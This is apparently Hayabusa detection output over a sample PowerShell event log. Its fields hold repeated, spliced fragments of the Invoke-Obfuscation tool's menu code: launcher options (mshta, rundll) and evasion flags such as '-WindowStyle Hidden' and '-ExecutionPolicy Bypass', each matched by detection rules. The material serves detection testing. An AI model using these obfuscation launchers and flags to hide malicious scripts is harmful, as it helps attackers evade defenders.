23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. 
$TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. 
$AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. 
If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. 
$AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. 
If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. 
$TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. 
$AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. 
If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. 
$AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. 
If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). 
If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. 
If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. 
